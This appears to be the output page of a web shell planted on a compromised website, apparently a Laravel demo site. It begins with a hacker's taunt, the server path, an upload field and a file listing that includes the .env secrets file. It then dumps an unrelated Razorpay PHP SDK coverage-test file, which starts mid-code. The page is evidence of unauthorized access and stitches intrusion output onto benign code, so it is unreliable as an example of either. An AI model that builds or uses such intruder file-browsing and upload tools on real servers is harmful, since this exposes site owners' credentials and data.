I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
setup();
$transfer->testFetchTokenByCustomerId();
$transfer->testCreateToken();
$transfer->testFetchTokenByPaymentId();
$transfer->testProcessPaymentOnAlternatePAorPG();
$transfer->testDeleteToken();
}
/**
* @covers \Razorpay\Api\Account::create
* @covers \Razorpay\Api\Account::fetch
* @covers \Razorpay\Api\Account::edit
* @covers \Razorpay\Api\Account::delete
*/
public function testAccountCoverage(){
$account = new PartnerTest();
$account->setup();
$account->testCreateAccount();
$account->testFetchAccount();
//$account->testEditAccount();
$account->testDeleteAccount();
}
/**
* @covers \Razorpay\Api\Stakeholder::create
* @covers \Razorpay\Api\Stakeholder::fetch
* @covers \Razorpay\Api\Stakeholder::all
*/
public function testStakeholderCoverage(){
$stakeholder = new PartnerTest();
$stakeholder->setup();
$stakeholder->testCreateStakerholder();
$stakeholder->testFetchStakerholder();
$stakeholder->testFetchAllStakerholder();
}
/**
* @covers \Razorpay\Api\Product::requestProductConfiguration
* @covers \Razorpay\Api\Product::fetch
* @covers \Razorpay\Api\Product::edit
* @covers \Razorpay\Api\Product::fetchTnc
* @covers \Razorpay\Api\Stakeholder::edit
*/
public function testProductCoverage(){
$product = new PartnerTest();
$product->setup();
$product->testProductConfiguration();
$product->testProductFetch();
$product->testProductEdit();
$product->testFetchTnc();
//$product->testEditStakerholder();
}
/**
* @covers \Razorpay\Api\Webhook::create
* @covers \Razorpay\Api\Webhook::fetch
* @covers \Razorpay\Api\Webhook::all
* @covers \Razorpay\Api\Webhook::edit
* @covers \Razorpay\Api\Webhook::delete
*/
public function testWebhookCoverage(){
$webhook = new PartnerTest();
$webhook->setup();
$webhook->testWebhookCreate();
$webhook->testWebhookFetch();
$webhook->testFetchAllWebhook();
$webhook->testEditWebhook();
$webhook->testDeleteWebhook();
}
/**
* @covers \Razorpay\Api\Api::getAppsDetails
* @uses \Razorpay\Api\Api::setAppDetails
* @covers \Razorpay\Api\Api::getBaseUrl
* @uses \Razorpay\Api\Api::setBaseUrl
* @cover \Razorpay\Api\Api::getKey
* @cover \Razorpay\Api\Api::getSecret
* @cover \Razorpay\Api\Api::getFullUrl
* @cover \Razorpay\Api\Api::testgetheader
* @cover \Razorpay\Api\Request::addHeader
* @cover \Razorpay\Api\Request::getHeader
*/
public function testApiInstance(){
$instance = new ApiTest();
$instance->setup();
$instance->testGetAppDetails();
$instance->testSetBaseUrl();
$instance->testGetkey();
$instance->testGetSecret();
$instance->testFullUrl();
$instance->testgetheader();
}
/**
* @covers \Razorpay\Api\Plan::create
* @covers \Razorpay\Api\Plan::fetch
* @covers \Razorpay\Api\Plan::all
*/
public function testPlanCoverage(){
$subscription = new PlanTest();
$subscription->setup();
$subscription->testCreatePlan();
$subscription->testFetchAllPlans();
$subscription->testFetchPlan();
}
/**
* @covers \Razorpay\Api\QrCode::create
* @covers \Razorpay\Api\QrCode::fetch
* @covers \Razorpay\Api\QrCode::close
* @uses \Razorpay\Api\ArrayableInterface
* @covers \Razorpay\Api\QrCode::all
* @covers \Razorpay\Api\QrCode::fetchAllPayments
*/
public function testQrCodeCoverage(){
$qrCode = new QrCodeTest();
$qrCode->setup();
$qrCode->testCreateQrCode();
$qrCode->testFetchQrCode();
$qrCode->testCloseQrCode();
$qrCode->testFetchAllQrCode();
$qrCode->testFetchQrCodePaymentById();
}
/**
* @covers \Razorpay\Api\Refund::fetch
* @covers \Razorpay\Api\Refund::edit
* @covers \Razorpay\Api\Refund::all
* @covers \Razorpay\Api\Payment::fetchMultipleRefund
* @covers \Razorpay\Api\Payment::fetchRefund
*/
public function testRefundCoverage(){
$refund = new RefundTest();
$refund->setup();
$refund->testFetchRefund();
$refund->testFetchAllRefund();
$refund->testFetchMultipalRefund();
}
/**
* @covers \Razorpay\Api\Subscription::create
* @covers \Razorpay\Api\Subscription::fetch
* @covers \Razorpay\Api\Addon::fetchAll
* @covers \Razorpay\Api\Subscription::all
*/
public function testSubscriptionCoverage(){
$subscription = new SubscriptionTest();
$subscription->setup();
$subscription->testCreateSubscription();
$subscription->testSubscriptionFetchId();
$subscription->testFetchAddons();
$subscription->testFetchAllSubscriptions();
}
/**
* @covers \Razorpay\Api\VirtualAccount::create
* @covers \Razorpay\Api\VirtualAccount::all
* @covers \Razorpay\Api\VirtualAccount::payments
* @uses \Razorpay\Api\VirtualAccount::fetch
* @covers \Razorpay\Api\VirtualAccount::close
*/
public function testVirtualAccountCoverage(){
$virtualAccount = new VirtualAccountTest();
$virtualAccount->setup();
$virtualAccount->testCreateVirtualAccount();
$virtualAccount->testFetchAllVirtualAccounts();
$virtualAccount->testFetchPayment();
$virtualAccount->testCloseVirtualAccount();
}
/**
* @covers \Razorpay\Api\Addon::fetch
* @covers \Razorpay\Api\Addon::fetchAll
*/
public function testAddonCoverage(){
$addon = new AddonTest();
$addon->setUp();
$addon->testFetchSubscriptionLink();
$addon->testFetchAllAddon();
}
/**
* @covers \Razorpay\Api\Customer::create
* @covers \Razorpay\Api\Entity::create
* @covers \Razorpay\Api\Customer::edit
* @covers \Razorpay\Api\Entity::getEntityUrl
* @covers \Razorpay\Api\Customer::all
* @covers \Razorpay\Api\Entity::all
* @covers \Razorpay\Api\Customer::fetch
* @covers \Razorpay\Api\Entity::fetch
* @covers \Razorpay\Api\Entity::validateIdPresence
* @covers \Razorpay\Api\Entity::snakeCase
* @covers \Razorpay\Api\Entity::request
* @covers \Razorpay\Api\Entity::buildEntity
* @covers \Razorpay\Api\Entity::getDefinedEntitiesArray
* @covers \Razorpay\Api\Entity::getEntityClass
* @covers \Razorpay\Api\Entity::getEntity
* @covers \Razorpay\Api\Entity::fill
* @covers \Razorpay\Api\Entity::isAssocArray
* @covers \Razorpay\Api\Entity::toArray
* @covers \Razorpay\Api\Entity::convertToArray
* @covers \Razorpay\Api\Collection::count
*/
public function testCustomerCoverage(){
$customer = new CustomerTest();
$customer->setUp();
$customer->testCreateCustomer();
$customer->testEditCustomer();
$customer->testFetchAll();
$customer->testFetchCustomer();
usleep(500000);
}
/**
* @covers \Razorpay\Api\Card::fetch
* @covers \Razorpay\Api\Request::request
* @covers \Razorpay\Api\Request::checkErrors
* @covers \Razorpay\Api\Request::getRequestHeaders
* @covers \Razorpay\Api\Request::constructUa
* @covers \Razorpay\Api\Request::getAppDetailsUa
*/
public function testCardCoverage(){
$card = new CardTest();
$card->setup();
$card->testFetchCard();
}
/**
* @covers \Razorpay\Api\FundAccount::create
* @covers \Razorpay\Api\FundAccount::all
*/
public function testFundCoverage(){
$fund = new FundTest();
$fund->setup();
$fund->testCreateFundAccount();
$fund->testCreateOrder();
}
/**
* @covers \Razorpay\Api\Invoice::create
* @covers \Razorpay\Api\Invoice::all
* @covers \Razorpay\Api\Invoice::edit
* @covers \Razorpay\Api\Invoice::notifyBy
* @covers \Razorpay\Api\Invoice::delete
* @covers \Razorpay\Api\Invoice::cancel
* @uses \Razorpay\Api\Invoice::fetch
*/
public function testInvoiceCoverage(){
$invoice = new InvoiceTest();
$invoice->setup();
$invoice->testCreateInvoice();
$invoice->testFetchAllInvoice();
$invoice->testUpdateInvoice();
$invoice->testInvoiceIssue();
$invoice->testDeleteInvoice();
$invoice->testCancelInvoice();
}
/**
* @covers \Razorpay\Api\Item::create
* @covers \Razorpay\Api\Item::fetch
* @covers \Razorpay\Api\Item::edit
* @covers \Razorpay\Api\Item::all
* @covers \Razorpay\Api\Item::delete
*/
public function testItemCoverage(){
$item = new ItemTest();
$item->setup();
$item->testcreate();
$item->testAllItems();
$item->testfetchItem();
$item->testUpdate();
$item->testDelete();
}
/**
* @covers \Razorpay\Api\Order::create
* @covers \Razorpay\Api\Order::all
* @covers \Razorpay\Api\Order::fetch
* @covers \Razorpay\Api\Order::edit
*/
public function testOrderCoverage(){
$order = new OrdersTest();
$order->setup();
$order->testCreateOrder();
$order->testAllOrders();
$order->testFetchOrder();
$order->testUpdateOrder();
}
/**
* @covers \Razorpay\Api\Payment::fetch
* @covers \Razorpay\Api\Payment::all
* @covers \Razorpay\Api\Payment::edit
* @covers \Razorpay\Api\Order::payments
* @covers \Razorpay\Api\Payment::fetchCardDetails
* @covers \Razorpay\Api\Payment::fetchPaymentDowntime
* @covers \Razorpay\Api\Payment::fetchPaymentDowntimeById
*/
public function testPaymentCoverage(){
$order = new PaymentTest();
$order->setup();
$order->testFetchPayment();
$order->testFetchAllPayment();
$order->testUpdatePayment();
$order->testFetchOrderPayment();
$order->testFetchCardWithPaymentId();
$order->testfetchPaymentDowntime();
$order->testfetchPaymentDowntimeById();
}
/**
* @covers \Razorpay\Api\PaymentLink::create
* @covers \Razorpay\Api\PaymentLink::fetch
* @covers \Razorpay\Api\PaymentLink::all
* @covers \Razorpay\Api\PaymentLink::cancel
* @covers \Razorpay\Api\PaymentLink::edit
* @covers \Razorpay\Api\PaymentLink::notifyBy
*/
public function testPaymentlinkCoverage(){
$paymentlink = new PaymentLinkTest();
$paymentlink->setup();
$paymentlink->testCreatePaymentLink();
$paymentlink->testFetchRefund();
$paymentlink->testFetchAllMutlipleRefund();
$paymentlink->testCancelPaymentLink();
$paymentlink->testUpdatePaymentLink();
$paymentlink->testSendNotification();
}
/**
* @covers \Razorpay\Api\Settlement::all
* @covers \Razorpay\Api\Settlement::settlementRecon
*/
public function testSettlementCoverage(){
$paymentlink = new SettlementTest();
$paymentlink->setup();
$paymentlink->testAllSettlements();
$paymentlink->testSettlementRecon();
}
/**
* @covers \Razorpay\Api\Order::transfers
* @covers \Razorpay\Api\Transfer::all
* @covers \Razorpay\Api\Payment::transfers
* @covers \Razorpay\Api\Transfer::fetch
* @covers \Razorpay\Api\Transfer::all
*/
public function testTransferCoverage(){
$transfer = new TransferTest();
$transfer->setup();
$transfer->testFetchTransferOrder();
$transfer->testFetchSettlement();
$transfer->testFetchTransferPayment();
$transfer->testFetchTransfer();
$transfer->testFetchSettlement();
}
/**
* @covers \Razorpay\Api\Utility::verifyPaymentSignature
* @covers \Razorpay\Api\Utility::verifySignature
* @covers \Razorpay\Api\Utility::hashEquals
* @covers \Razorpay\Api\Errors\SignatureVerificationError
*/
public function testUtilityCoverage(){
$utility = new SignatureVerificationTest();
$utility->setup();
$utility->testPaymentVerification();
$utility->testPaymentLinkVerification();
$utility->testSubscriptionVerification();
}
/**
* @covers \Razorpay\Api\Order::create
*/
public function testSetHeaderJson()
{
$order = new ExceptionTest();
$order->setup();
$order->testCreateOrderSetHeaderException();
}
/**
* @covers \Razorpay\Api\Order::create
*/
public function testSendArrayPayload()
{
$order = new ExceptionTest();
$order->setup();
$order->testCreateOrderSuccess();
}
}